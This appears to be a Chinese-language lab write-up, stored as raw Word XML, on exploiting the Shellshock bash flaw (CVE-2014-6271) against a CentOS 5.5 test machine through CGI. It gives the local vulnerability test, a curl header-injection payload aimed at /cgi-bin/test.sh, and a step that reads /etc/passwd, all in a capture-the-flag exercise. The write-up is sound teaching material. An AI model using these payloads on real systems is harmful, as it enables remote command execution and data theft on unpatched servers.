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04CF" w14:textId="2BABD0AD" w:rsidR="008D4B78" w:rsidRPr="00B61C1D" w:rsidRDefault="008D4B78">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B61C1D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>实验环境：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795B4959" w14:textId="02BD61DB" w:rsidR="004471E0" w:rsidRPr="00282FB7" w:rsidRDefault="001D649B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00282FB7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>攻击机：</w:t>
      </w:r>
      <w:r w:rsidR="00763E04">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>BT5</w:t>
      </w:r>
      <w:r w:rsidR="0044288A" w:rsidRPr="00282FB7">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  IP</w:t>
      </w:r>
      <w:r w:rsidR="0044288A" w:rsidRPr="00282FB7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：192.168.</w:t>
      </w:r>
      <w:r w:rsidR="00763E04">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>44.23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27483D9D" w14:textId="40A27D71" w:rsidR="001D649B" w:rsidRPr="00282FB7" w:rsidRDefault="001D649B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00282FB7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>靶机：</w:t>
      </w:r>
      <w:r w:rsidR="00763E04">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Centos5.5</w:t>
      </w:r>
      <w:r w:rsidR="0044288A" w:rsidRPr="00282FB7">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   IP</w:t>
      </w:r>
      <w:r w:rsidR="0044288A" w:rsidRPr="00282FB7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：192.168.</w:t>
      </w:r>
      <w:r w:rsidR="00763E04">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>44.130</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA366FD" w14:textId="50B2AE88" w:rsidR="004471E0" w:rsidRPr="00282FB7" w:rsidRDefault="004471E0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71DE8134" w14:textId="461B4FAE" w:rsidR="004471E0" w:rsidRPr="00FE7916" w:rsidRDefault="00911F76">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE7916">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1.判断漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B097782" w14:textId="5CD0673B" w:rsidR="009D11D2" w:rsidRDefault="00FB48B2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidR="00FE42BC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Centos5.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>输入以下指令，如果出现"</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB48B2">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00282FB7">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CVE-2014-6271</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"字样则代表存在漏洞：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CCB149" w14:textId="58F6B1A2" w:rsidR="00911F76" w:rsidRPr="00282FB7" w:rsidRDefault="00D81757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00282FB7">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>env x='() { :;}; echo Vulnerable CVE-2014-6271 ' bash -c "echo test"</w:t>
      </w:r>
      <w:r w:rsidR="00FD6233">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9CB1E6" w14:textId="221A7124" w:rsidR="00D81757" w:rsidRPr="00282FB7" w:rsidRDefault="004F46D0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B7323AE" wp14:editId="6918B533">
            <wp:extent cx="5900816" cy="5143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203" cy="5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05CC" w14:textId="77777777" w:rsidR="00BB425C" w:rsidRPr="00282FB7" w:rsidRDefault="00BB425C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="669DF2EE" w14:textId="0F9C90E7" w:rsidR="00911F76" w:rsidRPr="00FE7916" w:rsidRDefault="00911F76">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE7916">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE7916">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>服务配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3C5916" w14:textId="6B1C558A" w:rsidR="00C54B58" w:rsidRDefault="00B00178" w:rsidP="00B00178">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B00178">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>vi /etc/</w:t>
      </w:r>
      <w:r w:rsidR="00A61A1B">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>httpd/conf/httpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390A6DB1" w14:textId="12A5D405" w:rsidR="00CE5D66" w:rsidRDefault="00CE5D66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EC38B5F" wp14:editId="26B62A9A">
            <wp:extent cx="5274310" cy="11042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253" w14:textId="4D319C48" w:rsidR="00CE5D66" w:rsidRDefault="00CE5D66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34541FD" wp14:editId="1301337F">
            <wp:extent cx="4619048" cy="22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D0FF" w14:textId="519237B3" w:rsidR="00C6433C" w:rsidRDefault="00CE5D66" w:rsidP="00B0017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6FB99F" wp14:editId="093CD437">
            <wp:extent cx="5274310" cy="1619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26" b="4038"/>
                    <a:stretch/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2DF7" w14:textId="54DB77AA" w:rsidR="006A6256" w:rsidRDefault="009A08AD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250FE2D" wp14:editId="4833D1E6">
            <wp:extent cx="4209524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007" w:rsidRPr="00721007">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00721007">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="452C352D" wp14:editId="4C00C6E7">
            <wp:extent cx="2495238" cy="5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12B9" w14:textId="6777BA29" w:rsidR="00F04276" w:rsidRDefault="00351B89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72DA111" wp14:editId="2C88F1C7">
            <wp:extent cx="3076190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A895D1" w14:textId="4D884E43" w:rsidR="004A04FE" w:rsidRDefault="004A04FE" w:rsidP="00B00178">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="234A8F1C" w14:textId="6920E6E6" w:rsidR="004A04FE" w:rsidRDefault="004A04FE" w:rsidP="00B00178">
      <w:pPr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远程</w:t>
      </w:r>
      <w:r w:rsidR="00FA5A44">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>渗透</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E46F666" w14:textId="6B47B81C" w:rsidR="00E30A03" w:rsidRDefault="00E30A03" w:rsidP="00B00178">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>渗透指令：</w:t>
      </w:r>
      <w:r>
        <w:t>curl -H 'x: () { :;};a=`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击命令</w:t>
      </w:r>
      <w:r>
        <w:t>`;echo $a' 'http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>靶机</w:t>
      </w:r>
      <w:r>
        <w:t>IP地址/cgi-bin/test.sh' -I</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191D9B9D" w14:textId="207B50C3" w:rsidR="006F64EC" w:rsidRDefault="006F64EC" w:rsidP="00B00178">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先使用普通的/bin/cat /etc/passwd</w:t>
      </w:r>
      <w:r w:rsidR="000E6870">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令来查看是否有回显</w:t>
      </w:r>
      <w:r w:rsidR="00D07934">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00582844">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果有则</w:t>
      </w:r>
      <w:r w:rsidR="00495218">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以进行下一步操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD8C414" w14:textId="1AAB1A8B" w:rsidR="004A04FE" w:rsidRDefault="007C5B92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126098F" wp14:editId="7E378EBB">
            <wp:extent cx="5274310" cy="27082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3A71" w14:textId="77AFA913" w:rsidR="0061674D" w:rsidRDefault="0061674D" w:rsidP="00B00178">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidR="000C6C59">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Centos5.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> /root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>目录下创建flag文件并降低</w:t>
      </w:r>
      <w:r w:rsidR="007D68A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/root目录权限</w:t>
      </w:r>
      <w:r w:rsidR="00C65261">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFCB55E" w14:textId="57395DEE" w:rsidR="007B7537" w:rsidRDefault="0072186F" w:rsidP="00B0017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D55218" wp14:editId="7EE83D2C">
            <wp:extent cx="5274310" cy="9988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58C1" w14:textId="33553283" w:rsidR="00585BA9" w:rsidRDefault="001C1BBC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67FA31B" wp14:editId="115F8B11">
            <wp:extent cx="5274310" cy="11125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436D" w14:textId="68C4F981" w:rsidR="001A4687" w:rsidRDefault="001A2E99" w:rsidP="00B00178">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>将/root目录下的flag文件复制到网站目录下</w:t>
      </w:r>
      <w:r w:rsidR="003E1B35">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4659467A" w14:textId="1F024E55" w:rsidR="001A4687" w:rsidRDefault="008E79E3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683CCE0" wp14:editId="68410D17">
            <wp:extent cx="5274310" cy="12033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94E" w14:textId="213B859B" w:rsidR="00D36A90" w:rsidRDefault="00D36A90" w:rsidP="00B00178">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidR="002C2443">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Centos5.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>网站目录下查看发现存在该文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EEE3FA" w14:textId="29FFA654" w:rsidR="00F42CA9" w:rsidRDefault="00C8287C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F9CA33B" wp14:editId="6733633F">
            <wp:extent cx="5274310" cy="5429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558"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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DAEC" w14:textId="3DFC280E" w:rsidR="008D0513" w:rsidRDefault="0043061E" w:rsidP="00B00178">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="008D0513">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>通过浏览器访问查看flag文件获取</w:t>
      </w:r>
      <w:r w:rsidR="007152A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文件内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011FD65B" w14:textId="624281F8" w:rsidR="00885DD1" w:rsidRPr="00282FB7" w:rsidRDefault="00CC5F1B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C81050D" wp14:editId="6CAB8429">
            <wp:extent cx="3990476" cy="11523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D1" w:rsidRPr="0028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00"/>
    <w:rsid w:val="00053CE3"/>
    <w:rsid w:val="000C1FF2"/>
    <w:rsid w:val="000C6C59"/>
    <w:rsid w:val="000C709C"/>
    <w:rsid w:val="000E6870"/>
    <w:rsid w:val="00174ADE"/>
    <w:rsid w:val="001926CC"/>
    <w:rsid w:val="001A2E99"/>
    <w:rsid w:val="001A4687"/>
    <w:rsid w:val="001C1BBC"/>
    <w:rsid w:val="001D649B"/>
    <w:rsid w:val="00244C2F"/>
    <w:rsid w:val="00282FB7"/>
    <w:rsid w:val="002C2443"/>
    <w:rsid w:val="00351B89"/>
    <w:rsid w:val="00352286"/>
    <w:rsid w:val="00361C8C"/>
    <w:rsid w:val="00376E0F"/>
    <w:rsid w:val="003E1B35"/>
    <w:rsid w:val="003E7277"/>
    <w:rsid w:val="00401408"/>
    <w:rsid w:val="00404942"/>
    <w:rsid w:val="00424B98"/>
    <w:rsid w:val="0043061E"/>
    <w:rsid w:val="0044288A"/>
    <w:rsid w:val="004471E0"/>
    <w:rsid w:val="00452083"/>
    <w:rsid w:val="0046047F"/>
    <w:rsid w:val="004746A2"/>
    <w:rsid w:val="00495218"/>
    <w:rsid w:val="004A04FE"/>
    <w:rsid w:val="004F46D0"/>
    <w:rsid w:val="00582844"/>
    <w:rsid w:val="00585BA9"/>
    <w:rsid w:val="0061674D"/>
    <w:rsid w:val="006A6256"/>
    <w:rsid w:val="006E1C74"/>
    <w:rsid w:val="006F64EC"/>
    <w:rsid w:val="00703635"/>
    <w:rsid w:val="007152A0"/>
    <w:rsid w:val="00721007"/>
    <w:rsid w:val="0072186F"/>
    <w:rsid w:val="00763AF9"/>
    <w:rsid w:val="00763E04"/>
    <w:rsid w:val="00770CC2"/>
    <w:rsid w:val="007B7537"/>
    <w:rsid w:val="007C5B92"/>
    <w:rsid w:val="007D191C"/>
    <w:rsid w:val="007D68A6"/>
    <w:rsid w:val="00832239"/>
    <w:rsid w:val="00885DD1"/>
    <w:rsid w:val="008C667D"/>
    <w:rsid w:val="008D0513"/>
    <w:rsid w:val="008D4B78"/>
    <w:rsid w:val="008E79E3"/>
    <w:rsid w:val="00911F76"/>
    <w:rsid w:val="009A08AD"/>
    <w:rsid w:val="009A7AAE"/>
    <w:rsid w:val="009D11D2"/>
    <w:rsid w:val="00A61A1B"/>
    <w:rsid w:val="00A84D80"/>
    <w:rsid w:val="00B00178"/>
    <w:rsid w:val="00B61C1D"/>
    <w:rsid w:val="00B941CA"/>
    <w:rsid w:val="00B94F69"/>
    <w:rsid w:val="00BB425C"/>
    <w:rsid w:val="00C06D5E"/>
    <w:rsid w:val="00C54B58"/>
    <w:rsid w:val="00C6433C"/>
    <w:rsid w:val="00C65261"/>
    <w:rsid w:val="00C67426"/>
    <w:rsid w:val="00C8287C"/>
    <w:rsid w:val="00CC5F1B"/>
    <w:rsid w:val="00CE5D66"/>
    <w:rsid w:val="00D07934"/>
    <w:rsid w:val="00D36A90"/>
    <w:rsid w:val="00D70388"/>
    <w:rsid w:val="00D81757"/>
    <w:rsid w:val="00DF7988"/>
    <w:rsid w:val="00E27B00"/>
    <w:rsid w:val="00E30A03"/>
    <w:rsid w:val="00F04276"/>
    <w:rsid w:val="00F42CA9"/>
    <w:rsid w:val="00F70B40"/>
    <w:rsid w:val="00FA5A44"/>
    <w:rsid w:val="00FB48B2"/>
    <w:rsid w:val="00FD6233"/>
    <w:rsid w:val="00FE023A"/>
    <w:rsid w:val="00FE42BC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ED"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{674DAF54-9FB5-4CB4-B301-C6269F00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89</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-03-15T06:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-03-17T06:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>